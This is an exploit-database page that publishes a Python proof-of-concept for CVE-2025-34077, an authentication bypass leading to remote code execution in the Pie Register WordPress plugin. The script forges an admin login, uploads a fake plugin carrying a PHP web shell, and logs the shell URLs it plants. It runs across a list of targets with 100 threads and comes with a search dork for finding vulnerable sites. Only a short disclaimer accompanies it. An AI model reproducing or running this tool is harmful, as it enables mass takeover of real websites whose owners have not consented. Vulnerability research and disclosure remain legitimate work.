Skip to main content
Home/Exploits/WebApps/Pie Register WordPress Plugin 3.7.1.4 – Authentication Bypass to RCE
EXPLOIT CRITICAL (9.8)

Pie Register WordPress Plugin 3.7.1.4 – Authentication Bypass to RCE

CVE ID: CVE-2025-34077
Vulnerability Type: Remote Code Execution (RCE)
Author: Md Amanat Ullah (xSwads)
Categories: WebApps

Pie Register WordPress Plugin 3.7.1.4 – Authentication Bypass to RCE

Proof of Concept (PoC)

poc.py 
# Exploit Title: Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE
# Google Dork: inurl:/wp-content/plugins/pie-register/
# Date: 2025-07-09
# Exploit Author: Md Amanat Ullah (xSwads)
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link:
https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: Ubuntu 22.04
# CVE: CVE-2025-34077

#!/usr/bin/env python3
import requests
import zipfile
import io
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import Fore, Style, init
from threading import Lock
init(autoreset=True)

SHELL_PHP = "<?php if(isset($_GET['cmd'])) echo shell_exec($_GET['cmd']); ?>"
PLUGIN_DIR = "evilplugin"
ZIP_NAME = "evilplugin.zip"
SHELL_FILE = "shell.php"
OUTPUT_FILE = "Shells.txt"
HEADERS = {'User-Agent': 'Mozilla/5.0'}
TIMEOUT = 10
lock = Lock()

def FilterURLS(site):
    site = site.strip()
    if not site.startswith(('http://', 'https://')):
        site = 'http://' + site
    if not site.endswith('/'):
        site += '/'
    return site

def make_shell_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr(f"{PLUGIN_DIR}/{PLUGIN_DIR}.php", "<?php /* Plugin */ ?>")
        z.writestr(f"{PLUGIN_DIR}/{SHELL_FILE}", SHELL_PHP)
    buf.seek(0)
    return buf

def exploit(target):
    target = FilterURLS(target)
    session = requests.Session()
    data = {"social_site": "true", "user_id_social_site": "1"}
    try:
        r = session.post(f"{target}?pr_social_login=1", data=data, headers=HEADERS, timeout=TIMEOUT)
    except:
        print(f"{Fore.RED}[Failed] - {target}")
        return

    if not session.cookies:
        print(f"{Fore.RED}[Failed] - {target}")
        return
    files = {"pluginzip": (ZIP_NAME, make_shell_zip(), "application/zip")}
    try:
        upload = session.post(f"{target}wp-admin/plugin-install.php?upload", files=files, headers=HEADERS, timeout=TIMEOUT)
    except:
        print(f"{Fore.RED}[Failed] - {target}")
        return

    if "Plugin installed successfully" in upload.text:
        shell_url = f"{target}wp-content/plugins/{PLUGIN_DIR}/{SHELL_FILE}"
        print(f"{Fore.GREEN}[Exploited] - {shell_url}")
        with lock:
            with open(OUTPUT_FILE, "a") as f:
                f.write(shell_url + "n")
    else:
        print(f"{Fore.RED}[Failed] - {target}")

def main(targets_file):
    with open(targets_file, "r") as f:
        targets = [line.strip() for line in f if line.strip()]

    with ThreadPoolExecutor(max_workers=100) as executor:
        futures = [executor.submit(exploit, target) for target in targets]
        for _ in as_completed(futures):
            pass

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} list.txt")
        sys.exit(1)

    main(sys.argv[1])

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...